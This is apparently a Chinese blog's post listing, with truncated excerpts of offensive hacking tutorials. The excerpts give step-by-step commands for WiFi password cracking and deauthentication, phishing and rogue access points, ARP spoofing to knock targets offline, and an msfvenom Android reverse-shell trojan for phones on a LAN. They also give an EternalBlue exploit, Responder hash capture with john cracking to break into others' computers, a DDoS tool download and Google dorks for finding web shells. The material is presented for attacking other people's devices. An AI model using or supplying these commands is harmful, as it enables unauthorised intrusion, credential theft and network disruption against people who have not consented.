黑客攻击
铿锵的玫瑰
业余爱好者
展开
-
无线网络的暴力破解密码
抓取局域网内的数据包airodump-ng wlan0mon过滤指定的数据包airodump-ng wlan0mon -c * --bssid *将抓取的数据包保存至指定的目录中airodump-ng wlan0mon -c *(指定通道) --bssid *(指定bssid) -w *(指定路径)实现客户端断网攻击,实现获取握手报文aireplay-ng -0 2 ...原创 2019-04-01 08:25:38 · 5518 阅读 · 0 评论 -
基于动态规则设定wifi密码破解
将密码可能的开头写入文本中touch *.txt编辑配置文件,自定义动态规则vim /etc/john/john.conf#定义后四位的规则:均属于0-9#Try the second half of split passwords$[0-9]$[0-9]$[0-9]$[0-9]将匹配格式的字典进行输出john --wordlist=*.txt(自定义规则文本) --ru...原创 2019-04-01 08:25:55 · 651 阅读 · 0 评论 -
基于WIFI-Pumpkin的流氓AP的实现
利用git工具下载WIFI-Pumpkingit clone https://github.com/P0cL4bs/WiFi-Pumpkin解压WIFI-Pumpkinsudo dpkg -i *.deb安装WIFI-Pumpkin./installer.sh -install打开WIFI-Pumpkinsudo wifi-pumpkin配置WIFI-Pumpki...原创 2019-04-01 08:26:02 · 2105 阅读 · 1 评论 -
基于Fluxion实现钓鱼AP的搭建
从Github上下载Fluxiongit clone https://www.github.com/FluxionNetwork/fluxion.git进入Fluxion目录cd fluxion运行自动安装文件./fluxion.sh选择语言选择攻击方式:选择1,从而实现创建一个同名的AP来欺骗用户选择哪个无线网卡来搜索AP选择要扫描的信道选择要...原创 2019-04-01 08:26:09 · 6506 阅读 · 9 评论 -
常用工具库
查找手机号曾经注册过的网站REG007https://www.reg007.com/搜索引擎的使用查找网址开放的端口http://tool.chinaz.com/http://coolaf.com/zh在线文件病毒扫描http://www.virscan.org/https://www.virustotal.com/#/home/upload社工库...原创 2019-04-02 08:08:36 · 4660 阅读 · 1 评论 -
网站信息的简单探测
输入如下命令获取网站指纹url --head *(网址)使用如下命令进行探测网站注册信息whois *(网站地址,不需要添加http://www)原创 2019-04-02 08:08:24 · 720 阅读 · 0 评论 -
利用fping探测内网主机
输入如下命令实现内网活跃主机的探测# 查看fping的版本fping -v# 查看本机的ipifconfig# fping -a -g 192.168.*.*(起始探测IP) 192.168.*.*(结束探测IP)原创 2019-04-02 08:08:30 · 1317 阅读 · 0 评论 -
Kali中常用的代理工具以及使用
常用的代理工具Mitmproxy功能介绍Mitmproxy功能使用利用mitmproxy实现端口的监听mitmproxy -p *(监听端口)配置客户端:点击Menu->Preference->NetWork Proxy->Setting->Manual proxy configuration->设置代理的IP地址以及端口QWASP ZA...原创 2019-04-01 08:22:47 · 7208 阅读 · 0 评论 -
Kali开放SSH端口
打开SSH的配置文件vim /etc/ssh/sshd_config编辑SSH的配置文件启动SSH服务service ssh start原创 2019-04-02 08:08:14 · 1039 阅读 · 0 评论 -
root用户无法运行tor解决办法
方案一创建一个用户,运行tor方案二编辑“start-tor-browser”文件,找到下面语句,删除或注释掉即可运行:#if [ “`id -u`” -eq 0 ]; then# complain “The Tor Browser Bundle should not be run as root. Exiting.”# exit 1#fihttps://blog.c...原创 2019-04-02 08:08:05 · 2689 阅读 · 0 评论 -
google hack实战测试---Jenkins/xampp
google Hack的基础知识http://www.pansoso.com/e/363225/http://www.pansoso.com/a/276623/https://www.exploit-db.com/google-hacking-database常用的后门查找方式intitle:"WSO2.4"[Sec.Info],[File],[Console],[Sql],[P...原创 2019-04-02 10:00:52 · 517 阅读 · 0 评论 -
kali的网卡配置
有线网卡配置cd /etc/network/vim interfaces通过添加USB设备来添加无线网卡 查看无线网卡ifconfig -a关闭lo回环网卡ifconfig lo down开启wlan0网卡ifconfig wlan0 up查看无线网卡的模式iwconfig查看无线网卡的芯片airmon-ng修改无线网卡的模式# 检测哪些进...原创 2019-04-01 08:25:48 · 11095 阅读 · 1 评论 -
Kali适合的网卡
Atheros AR9271(TL-WN722N) Ralink RT3070(HLK-3E33) Ralink RT3572 Realtek RTL8187L Realtek RTL8812AU 查看网卡支持的功能iw list查看网卡包注入功能的测试aireplay-ng -9 wlan0monCard To Card测试aireplay-ng -9 -i wla...原创 2019-04-01 08:24:39 · 17473 阅读 · 4 评论 -
实现手机由4G到2G的转换
拨打号码*#*#2288#*#*进入网络模式 选择切换当前模式为2G模式原创 2019-04-02 08:08:57 · 998 阅读 · 0 评论 -
基于vivoY97的Adb驱动程序的安装
为了能够实现vivoY97手机能够和电脑进行有线以及无线的数据传输,需要安装USB驱动以及Adb驱动。所有驱动的下载地址:https://download.csdn.net/download/lykymy/11074161具体的配置步骤如下所示:手机端点击“设置” 点击“更多设置” 点击“开发者选项”、打开“开发者选项” 打开“USB”调试、打开”选择USB配置:MTP"电...原创 2019-03-30 09:49:21 · 3904 阅读 · 0 评论 -
Selenium的安装以及WebDriver的配置
使用Anaconda进行selenium的安装安装WebDriver(Chrome(73.版本)、IE、FireFox、Edge) 注意:Chrome的WebDriver一定不要命名为Chrome.exe否则会在运行时出现错误!WebDriver的配置一种方式是通过直接将上述WebDriver拷贝到python.exe的同级目录下,前提是python.exe已经添加至环境变量中。 ...原创 2019-03-30 09:27:35 · 870 阅读 · 0 评论 -
基于UiAutomator的安卓手机攻击
代码下载地址:https://github.com/openatx/uiautomator2#connect-to-a-device安装教程进入python环境,执行如下命令行进行安装pip install --upgrade --pre uiautomator2使用adb进行电脑与手机端的连接,具体的连接方式请参考我写的另一篇博客:https://blog.csdn.net/LY...原创 2019-03-30 10:18:35 · 355 阅读 · 0 评论 -
基于Dos的黑客攻击
下载地址:https://github.com/Ha3MrX/DDos-Attack运行如下命令进行DDOS工具包的下载git clone https://github.com/Ha3MrX/DDos-Attack为工具包添加可执行权限cd DDos-Attackchmod +x ddos-attack.py启动Dos攻击工具python ddos-attack.py...原创 2019-03-30 10:35:51 · 790 阅读 · 0 评论 -
基于kali的局域网ARP攻击(命令行版本)
获取目标IP(检测当前局域网下的所有活跃的IP)fping -g -r 0 -s 192.168.85.0/24 | grep alive进行目标IP系统探测(探测是什么系统:电脑or手机)nmap -T4 -O 192.168.*.*(目标IP)进行双向ARP数据劫持:造成断网arpspoof -i eth0 -t 192.168.1.1(网关) 192.168.*.*(目标...原创 2019-03-30 10:47:37 · 2391 阅读 · 0 评论 -
利用Kali入侵局域网的手机
生成木马病毒(将生成的apk文件拷贝到手机)msfvenom -p android/meterpreter/reverse_tcp LHOST=*.*.*.*(本地IP) LPORT=*(本地端口) -o *(输出目录)启动postgresql数据库service postgresql start启动msfconsolemsfconsole使用探测句柄use explo...原创 2019-03-30 11:02:36 · 26167 阅读 · 17 评论 -
基于Android手机的Kali工具安装
安装Termux,其是运行在手机端的linux模拟器 安装Git,从而实现下面工具的安装。具体的安装命令如下所示:pkg install git从GitHub上下载Lazymux:git clone https://github.com/Gameye98/安装Python2的环境pkg install python2运行安装脚本python2 lazymux.py...原创 2019-03-30 12:50:08 · 11268 阅读 · 3 评论 -
基于Android实现Tool-X工具的安装
安装模拟终端TerMux 更新pkg安装包源pkg update安装git工具pkg install git下载Tool-x工具git clone https://github.com/Rajkumrdusad/Tool-k为install.aex添加可执行权限chmod +x install.aex运行install.aex./install.aex...原创 2019-03-30 14:06:28 · 4408 阅读 · 7 评论 -
TerMux配置Root用户
参考网站:https://www.sqlsec.com/2018/05/termux.html手机没有 root手机已经 root原创 2019-03-30 14:09:49 · 29738 阅读 · 2 评论 -
利用Metasploit渗透Android手机
参考网址:https://blog.csdn.net/Aaron_Miller/article/details/80375807实现内网穿透Metesploit木马入侵转载 2019-04-01 08:23:16 · 3571 阅读 · 2 评论 -
利用Bettercap实现密码的嗅探
原创 2019-04-01 08:23:31 · 1724 阅读 · 0 评论 -
实现局域网内window系统的漏洞扫描
扫描当前局域网内所有的活跃IPnmap 192.168.1.1/24 -v判断当前IP的机器类型nmap -T4 -O 192.168.*.*利用msf对“永恒之蓝”端口进行渗透msfconsoleuse exploit/windows/smb/ms17_010_eternalblueset rhost 192.168.*.*run...原创 2019-04-01 08:23:51 · 4509 阅读 · 1 评论 -
kali的软件包安装源配置
进入存储源列表的目录cd /etc/apt添加源gedit sources.list#官网deb http://http.kali.org/kali kali-rolling main non-free contribdeb-src http://http.kali.org/kali kali-rolling main non-free contrib#阿里云deb htt...原创 2019-04-01 08:24:09 · 8545 阅读 · 0 评论 -
基于Krack的网络攻击
更新软件包apt-get update安装相应的环境apt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome下载Krack运行脚本git clone https://github.com/...原创 2019-04-01 08:24:55 · 1731 阅读 · 0 评论 -
远程渗透登陆他人电脑
查看远程电脑IPipconfig扫描远程主机开放的端口(查看3389端口是否开放)nmap -Pn *.*.*.*(IP)执行渗透操作responder -I eth0 -wv稍等片刻终端上会显示用户名与密码(hash) 利用john进行密码的破解,进入如下目录进行查看:/usr/share/responer/logs。john HTTP-*.txt --wordl...原创 2019-04-17 11:12:37 · 6821 阅读 · 0 评论